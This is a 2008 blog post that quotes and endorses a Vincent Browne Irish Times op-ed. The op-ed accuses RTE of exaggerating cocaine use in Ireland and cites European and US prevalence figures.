					Vincent Browne on RTE’s coke habit
				
				
    
		Published January 4, 2008	
	
			
			
				Before Christmas, it seemed you could hardly read a newspaper, listen to the
radio or watch TV in Ireland without being bombarded with stories about how the
country was awash in cocaine.

It's an attractive story, tying in nicely with the death of lingerie model
Katy French, hand-wringing
over Ireland's recent 'celtic tiger' wealth, a supposed loss of our
traditions, etc. etc.  RTE, our national broadcaster, made a tabloid series
called 'High Society', which cashed in on the issue in a particularly crass way
-- crappy "reconstructions" of actors chopping lines with voiceovers,
dodgy-looking men handing over money to ominous music, that kind of thing.

Well, just before Christmas, 
Vincent Browne wrote a fantastic op-ed in the Irish Times regarding this.
I have to quote this particularly perceptive passage:


  Cocaine abuse is a social problem, but the thrust of much of RTE's coverage of the phenomenon is to suggest that it is a widespread, pervasive problem. There are no recent statistics available on the prevalence of cocaine consumption in Ireland - the last survey was done four years ago. The National Advisory Committee on Drugs (NACD) will be publishing a prevalence report next month and we will know then the size of the phenomenon.
  
  But we have some indicators about the scale of cocaine use. The European drug agency EMCDDA estimates that 3 per cent of all adults in Europe aged between 15 and 64 have used cocaine at least once in their lives.
  
  A third of these took cocaine during the previous year and half of these took cocaine during the previous month. This means that about 0.5 per cent of the adult population took cocaine over the previous month. And the data suggests that, for at least two-thirds of those who have ever taken cocaine, the drug is not a problem for them.
  
  In the US the statistics are higher. Almost 15 per cent of the population aged between 12 and 64 have taken cocaine in their lives and 2.5 per cent took cocaine over the previous year. Again, this is suggestive that cocaine use for most people is not a problem, otherwise the number of people who took cocaine during the previous year as a proportion of the number of people who ever took cocaine would be far higher.
  
  The figures for Ireland are likely to be that about 4 per cent of the adult population have taken cocaine in their lifetime, with about 1 per cent having taken cocaine in the previous year and 0.5 per cent having taken cocaine in the previous month.
  
  It would be better if people did not take cocaine, but the prevalent contention that the consumption of cocaine at all is necessarily harmful and addictive is obviously false.
  
  It would also be better if people did not drink here, for the problems related to the consumption of alcohol are far, far greater than in the case of cocaine.
  
  Instead of presenting a balanced picture of the cocaine phenomenon, RTE has greatly exaggerated the issue, in a way more typically associated with tabloid journalism.


Well said!



	
		Posts navigation
		Previous
1
2
3
…
19
Next